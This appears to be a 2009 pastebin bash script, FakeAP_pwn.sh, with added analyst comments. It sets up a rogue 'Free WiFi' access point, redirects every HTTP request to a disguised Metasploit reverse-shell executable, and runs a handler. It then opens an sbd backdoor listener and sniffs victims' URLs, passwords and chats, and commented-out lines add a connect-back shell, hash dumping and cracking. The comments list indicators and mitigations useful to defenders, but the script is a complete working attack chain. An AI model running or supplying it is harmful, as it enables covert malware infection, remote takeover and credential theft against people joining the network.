
g0tmi1k

a guest
Jun 25th, 2009
#!/bin/bash
# (C)opyright 2009 - g0tmi1k
#
# FakeAP_pwn.sh
#
# Rogue access point chain, annotated for analysis. Read top to bottom it:
#   1. advertises an open wireless network from ${fakeap_interface};
#   2. serves DHCP on the resulting tap interface (at0, 10.0.0.1/24) and NATs
#      client traffic out through ${internet_interface};
#   3. rewrites every plain-HTTP request (TCP/80) to a local Apache that hosts
#      a generated Windows executable;
#   4. blocks until a flag file appears, reinstalls the forwarding rules
#      without the HTTP redirect, then starts a listener and three sniffers.
#
# Host side effects: the filter and nat tables are flushed twice, IPv4
# forwarding is switched on and never switched off, and nothing is cleaned up
# on exit (no trap, background xterms keep running).
#
# Observable indicators taken from this file: SSID "Free WiFi", gateway
# 10.0.0.1, download name MS016455.exe, TCP port 7332, key string "g0tmi1k".
# What limits the chain on the client side: not auto-joining open networks,
# HTTPS/HSTS (only port 80 is redirected below), a VPN, and application
# allow-listing that refuses unsigned downloaded executables.

# Settings (exported, so every child process inherits them)
gatewayip=192.168.1.1
internet_interface=wlan0
fakeap_interface=wlan1
export gatewayip internet_interface fakeap_interface
echo "[>] Starting: FakeAP_pwn - g0tmi1k"

# Empties the filter and nat tables and deletes their user-defined chains.
# Any firewall policy that was loaded on this host is gone after this call.
flush_firewall() {
  iptables --flush
  iptables --table nat --flush
  iptables --delete-chain
  iptables --table nat --delete-chain
}

# Installs the three forwarding rules that both phases share.
install_forwarding_rules() {
  # Every UDP packet reaching PREROUTING (client DNS lookups included) is
  # rewritten to the upstream gateway.
  iptables --table nat --append PREROUTING --protocol udp --jump DNAT --to "${gatewayip}"
  # Disabled in the original:
  #iptables -P FORWARD ACCEPT
  iptables --append FORWARD --in-interface at0 --jump ACCEPT
  iptables --table nat --append POSTROUTING --out-interface "${internet_interface}" --jump MASQUERADE
}

# FakeAP
# airbase-ng runs as a software AP; -P answers every probe request and -C 30
# also beacons the probed names, so one radio answers for many ESSIDs. A
# wireless IDS can key on exactly that pattern. The tun module is needed for
# the at0 tap interface that airbase-ng creates.
echo "[+] Setting up FakeAP"
modprobe tun
xterm -geometry 75x15+1+0 -T FakeAP -e airbase-ng -P -C 30 -e "Free WiFi" "${fakeap_interface}" -v &
sleep 2

# Tables
# at0 becomes the clients' gateway (10.0.0.1/24, MTU 1400).
echo "[+] Setting up forwarding tables..."
ifconfig lo up
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
flush_firewall
echo 1 > /proc/sys/net/ipv4/ip_forward
install_forwarding_rules

# DHCP
# dhcpd.conf is not part of this page; the lease range is presumably inside
# 10.0.0.0/24 to match at0 (unverified).
echo "[+] Setting up DHCP server..."
xterm -geometry 75x25+1+100 -T DHCP -e dhcpd3 -d -f -cf /root/FakeAP_pwn/dhcpd.conf at0 &
sleep 2

# Web server that clients are sent to. This xterm is not backgrounded, so the
# script pauses here until the init script returns.
echo "[+] Start web server..."
# Disabled in the original:
#xterm -geometry 75x25+1+200  -T WebServer -e sh -c "start-apache"&
xterm -geometry 75x25+1+200 -T WebServer -e /etc/init.d/apache2 start
sleep 2

# HTTP redirect: any TCP/80 request, whatever its destination, is answered by
# 10.0.0.1. TCP/443 is not matched by this rule. From the client this looks
# like every http:// site returning the same page from the gateway address.
echo "[+] Force user to vist our site..."
iptables --table nat --append PREROUTING --protocol tcp --dport 80 --jump DNAT --to 10.0.0.1

# Payload and handler
# msfpayload writes a Windows reverse-TCP executable into the web root; the
# file name looks chosen to resemble a Microsoft update id (inferred). LPORT
# is not set, so the framework default (4444 in Metasploit) applies.
# The handler runs /root/FakeAP_pwn/fakeap_pwn.rb on each new session; that
# script is not on this page.
echo "[+] Here comes metasploit..."
cd /pentest/exploits/framework3
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 X > /var/www/MS016455.exe
echo "[+] Uploading SBD..."
xterm -geometry 75x25+1+300 -T Metasploit -e ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.0.0.1 AutoRunScript=/root/FakeAP_pwn/fakeap_pwn.rb E &
sleep 2
# Disabled in the original (session-side steps, kept for reference):
# upload //root/FakeAP_pwn/ C:/
# execute -f "C:/sbdbg.exe -q -r 10 -k g0tmi1k -e cmd -p 7332 10.0.0.1"
#./msfconsole -r /root/FakeAP_pwn/fakeap_pwn.rc

# Wait till user is connected
# /tmp/FakeAP_pwn.tmp is the "session established" flag; presumably the
# AutoRunScript creates it (not shown here). The name is fixed and lives in
# world-writable /tmp. rm has no -f, so it prints an error when the file is
# absent.
rm -r /tmp/FakeAP_pwn.tmp
echo "[-] Waitng for target to connect..."
until [ -e /tmp/FakeAP_pwn.tmp ]; do
  sleep 1
done

# Restore forwarding: same rules as the first phase minus the TCP/80 redirect,
# so the client's browsing works again. The route line repeats the one added
# earlier.
echo "[+] Give them (our) internet back..."
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
flush_firewall
install_forwarding_rules

# Listener
# sbd listens on TCP/7332 with a static shared key. The disabled "execute"
# line above shows the matching client side connecting back to 10.0.0.1:7332.
# Original note: *** If FakeAP_pwn.rb upload bit is edited, you could replace
# the line below with VNC! ***
echo "[+] Lets us back in..."
konsole -T BackDoor -e sbd -l -k g0tmi1k -p 7332 &
sleep 2

# Passive capture on wlan0 (literal name, not ${internet_interface}). These
# dsniff-suite tools only read cleartext protocols, which is why
# transport encryption on the client removes most of what they can collect.
echo "[+] Watch what they do..."
# URLs
xterm -geometry 100x10+470+0 -T URLs -e urlsnarf -i wlan0 &
# Passwords
xterm -geometry 100x10+470+150 -T Passwords -e dsniff -i wlan0 &
# IM Chats
xterm -geometry 100x10+470+300 -T "IM Chat" -e msgsnarf -i wlan0 &
echo
echo "[+] DONE - Have you, g0tmi1k?"


# Disabled in the original: session commands the author noted for later use.
#sysinfo
#getuid
#use priv
#hashdump > /tmp/FakeAP_pwn-hash.txt
##session -l
##session -i 1

# Disabled in the original: offline cracking of the dumped hashes.
#cd /pentest/passwords/jtr/
#./john /tmp/FakeAP_pwn-hash.txt